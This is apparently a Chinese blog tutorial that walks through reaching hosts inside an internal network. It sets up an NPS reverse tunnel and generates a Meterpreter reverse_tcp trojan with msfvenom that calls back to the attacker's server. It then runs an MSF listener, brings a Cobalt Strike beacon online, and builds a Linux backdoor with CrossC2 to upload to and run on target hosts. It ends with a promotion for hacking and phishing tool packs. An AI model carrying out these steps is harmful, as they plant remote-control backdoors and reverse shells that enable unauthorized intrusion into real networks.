内网安全-隧道搭建&穿透上线&内网渗透-Linux上线-cs上线Linux主机

内网安全-隧道搭建&穿透上线

内网穿透:解决网络控制上线&网络通讯问题 

隧道技术:解决不出网协议上线的问题(利用出网协议进行封装出网) 

代理技术:解决网络通讯不通的问题(利用跳板机建立节点后续操作) 

内网穿透-nps-自定义-上线

NPS工具介绍

一款轻量级、高性能、功能强大的内网代理服务器。支持tcp、udp、socks5、http等几乎所有流量转发,可用于访问内网网站、支付本地接口调试、ssh访问、远程桌面,内网dns解析、内网socks5代理等等……,并带有功能强大的web管理端。一个轻量级、高性能、强大的内网穿透代理服务器,带有强大的web管理端。
	项目地址:https://github.com/ehang-io/nps

 

搭建过程

一、访问项目地址,将服务端和客户端所对应的包进行下载(windows或Linux版本)

Linux版本为例

image-20240528191603774

下载完成后将服务端的包在服务器进行解压即可,解压完成后即可得到nps文件,如果没有可执行权限,赋予即可使用chmod命令。

image-20240528191731192

安装命令:

./nps install

运行命令:

./nps
//初始用户为admin,密码为123
//可通过配置文件修改nps.conf

image-20240528192047751

运行状态:

image-20240528191916627

访问服务器地址:8080即可,搭建完成。

image-20240528192116799

nps原理介绍

运行NPS服务的云服务器和运行NPS客户端的主机之间会创建一条TCP或UDP隧道,可以映射云服务器上的某个端口到客户端主机的指定端口,其他主机访问云服务器的这个端口的流量都会通过创建的这条隧道转发到映射的主机端口,实现内网穿透效果。

image-20230915011011277

MSF上线

一、服务端nps在客户端选项处,新增客户端

image-20240528192652552

二、将下载下的客户端解压完成后,执行客户端命令即可,然后在服务端可看到客户端的连接状态

image-20240528192441705

三、执行客户端命令,建立连接

image-20240528192808615

四、服务端更新,客户端显示在线

image-20240528192842663

五、隧道建立

image-20240528193025776

六、生成木马

msfvenom -p windows/meterpreter/reverse_tcp LHOST=nps服务器ip LPORT=服务端转发端口 -f exe -o nps.exe

七、kali 开启MSF开启监听

msf6 > use exploit/multi/handler 
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 0.0.0.0
lhost => 0.0.0.0
msf6 exploit(multi/handler) > set lport 8888
lport => 8888
msf6 exploit(multi/handler) > run

image-20240528193433335

八、将木马放到目标内网主机当中,执行即可

image-20240528193627502

九、成功上线MSF。观察发现本地8888端口。

运行NPS服务的云服务器和运行NPS客户端的主机之间会创建一条TCP或UDP隧道,可以映射云服务器上的某个端口到客户端主机的指定端口,其他主机访问云服务器的这个端口的流量都会通过创建的这条隧道转发到映射的主机端口,实现内网穿透效果。

image-20240528193752778

image-20240528194325048

CS上线

nps配置步骤和MSF上线一致。

cs配置,创建两个监听器,生成木马即可。

一、nps服务器转发配置监听

image-20240528195015709

二、内网上线主机配置监听

image-20240528195156995

image-20240528195225315

三、生成木马即可

image-20240528195348454

四、将木马上传到目标内网机当中,执行,成功上线

image-20240528195536791

image-20240528195630525

image-20240528200119114

image-20240528200134299

内网渗透-Linux上线-cs上线Linux主机

1.下载插件

crossC2主要面向企业自身及红队人员的安全评估框架,支持CobaltStrike对其他平台(Linux/MacOS/…)的安全评估,支持自定义模块,及包含一些常用的渗透模块。

插件地址:Release v3.3 - stable · gloxec/CrossC2 (github.com)

image-20240528201531585

2.导入插件模块

将下载下来的.cna导入到脚本管理器当中即可,然后进行加载。

image-20240528201657160

成功加载后,建议重启CS服务。

3.配置监听器

由于插件只支持HTTPS与TCP,所以选择的监听为HTTPS。

image-20240528202054260

4.服务端配置

将下载下来的结尾是.Linux的文件导入到服务器中,注意需要导入到CS目录下,并赋予执行权限。
	chmod u+x genCrossC2.Linux

image-20240528202725059

5.配置C2监听器并生成木马

此处两种方法:(1)图形化界面选择完成后,复制生成的命令。(2)命令行直接生成。

当在之前加载的插件后,就会出现这个CroseC2了,建议将.Linux文件上传到服务端并添加执行权限后,最好是重启以下CS客户端。
  这里选择HTTPS的选项。

image-20240528202140421

生成Linux后门木马。

隐藏文件在服务端通过ls -la可查看

image-20240528202928464

image-20240528202408051

点击生成以后,在cs端日志处会出现以下的信息

image-20240528203118373

将此内容复制,然后在服务端执行即可。

建议是在cs目录下执行,去除前面的绝对路径。

image-20240528203218993

注意:如果不能执行,出现问题,若日志显示出现MacOS系统内容,则是没有修改.cna文件的问题,修改.cna文件即可

找到cna文件,就是之前加载的cna插件文件,修改里面的地址,地址是cs文件夹,下面的是系统文件,也就是刚刚下载的.Linux文件名字,其它的是不需要修改的。
  修改后,要将CS客户端重启。

image-20240528203546955

修改完成以后,再次重新生成木马即可。

或此处生成Linux木马,可直接执行命令即可生成。可不用上面的图形化界面操作。如果命令不理解可继续选择上述图形化操作,最后复制命令即可。

./genCrossC2.Linux 服务器ip 监听端口 ./.cobaltstrike.beacon_keys null Linux x64 后门名称

6.执行木马

将生成的linux木马上传到目标服务器,执行即可

成功上线

image-20240528204105093

文件浏览

image-20240528204123498

黑客&网络安全如何学习

今天只要你给我的文章点赞,我私藏的网安学习资料一样免费共享给你们,来看看有哪些东西。

 1.学习路线图 

 攻击和防守要学的东西也不少,具体要学的东西我都写在了上面的路线图,如果你能学完它们,你去就业和接私活完全没有问题。

2.视频教程

网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。

内容涵盖了网络安全法学习、网络安全运营等保测评、渗透测试基础、漏洞详解、计算机基础知识等,都是网络安全入门必知必会的学习内容。

 

 (都打包成一块的了,不能一一展开,总共300多集)

因篇幅有限,仅展示部分资料,需要保存下方图片,微信扫码即可前往获取

3.技术文档和电子书

技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本,由于内容的敏感性,我就不一一展示了。 

 因篇幅有限,仅展示部分资料,需要保存下方图片,微信扫码即可前往获取

4.工具包、面试题和源码

“工欲善其事必先利其器”我为大家总结出了最受欢迎的几十款款黑客工具。涉及范围主要集中在 信息收集、Android黑客工具、自动化工具、网络钓鱼等,感兴趣的同学不容错过。 

 还有我视频里讲的案例源码和对应的工具包,需要的话也可以拿走。

因篇幅有限,仅展示部分资料,需要保存下方图片,微信扫码即可前往获取

 最后就是我这几年整理的网安方面的面试题,如果你是要找网安方面的工作,它们绝对能帮你大忙。

这些题目都是大家在面试深信服、奇安信、腾讯或者其它大厂面试时经常遇到的,如果大家有好的题目或者好的见解欢迎分享。

参考解析:深信服官网、奇安信官网、Freebuf、csdn等

内容特点:条理清晰,含图像化表示更加易懂。

内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…

 因篇幅有限,仅展示部分资料,需要保存下方图片,微信扫码即可前往获取 

  • 36
    点赞
  • 24
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值